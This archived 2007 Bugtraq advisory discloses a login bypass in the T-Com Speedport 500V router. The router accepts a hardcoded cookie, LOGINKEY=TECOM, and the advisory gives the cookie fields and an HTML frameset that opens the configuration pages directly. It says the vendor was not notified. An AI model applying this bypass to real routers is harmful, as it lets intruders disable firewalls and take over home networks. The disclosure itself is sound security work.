lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20070119145836.2545.qmail@securityfocus.com>
Date: 19 Jan 2007 14:58:36 -0000
From: advisory07@...p.ru
To: bugtraq@...urityfocus.com
Subject: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login
 bypass

- - - --------------------------------------------------------------------
Virginity Security Advisory 2007-001
- - - --------------------------------------------------------------------
             DATE : 2007-01-19 15:32 GMT
             TYPE : remote
VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31
           AUTHOR : Virginity
  ADVISORY NUMBER : 005
- - - --------------------------------------------------------------------


Description:

The Speedport 500V is a broadband-router which is sold in germany along
with ADSL lines. (just so you know)

The system is stupid and verifies wether you have entered the correct
password by setting a cookie with the content LOGINKEY=TECOM
(this is hardcoded and can not be changed)
If an attacker simply creates this cookie he can bypass password 
authentication by simply calling the configuration html sites directly.

The attacker then has nearly full system access (you cannot change the
system password without knowing the old one) and can change system
configuration e.g. disable the firewall. You can also perform a firmware
upgrade, which allows you to reset the password to the default one, which
now gives you full system access.

Vendor has not been notified. I don't think they care^^.

- - - --------------------------------------------------------------------


Example:

Create a cookie like this:

Name: LOGINKEY
Content: TECOM
Host: <ipaddress> <- replace this by your routers ipaddress ;)
Path: /
Expires: Never

create a html page like this and open it in your browser:

<html>
<frameset rows="44,*" border=0 frameborder=0 framespacing=0">
<frame src="http://<ipaddress>/b_banner.htm" name="banner">  
<frameset cols="170,*" border=0 frameborder=0 framespacing=0>
<frame src="http://<ipaddress>/m_startseite.htm" name="menu">
<frame src="http://<ipaddress>/hcti_startseite.htm" name="hcti">  
</frameset>
</frameset>
</html>

this will bypass the login screen and lead you directly to configuration 
menu.

- - - --------------------------------------------------------------------


Workaround:

Download the Sourcecode from the vendor (GPL), replace TECOM with something
else, try bulding it, and then try installing it on the hardware.
i did not try this. its stupid and does not really solve the problem.

- - - --------------------------------------------------------------------


Personal note:

Still here... sadly not dead yet. maybe i should hack the NSA so they kill
me? *lol* guess i'd have to learn some real things.... greetz to s.
and that other admin.

- - - --------------------------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ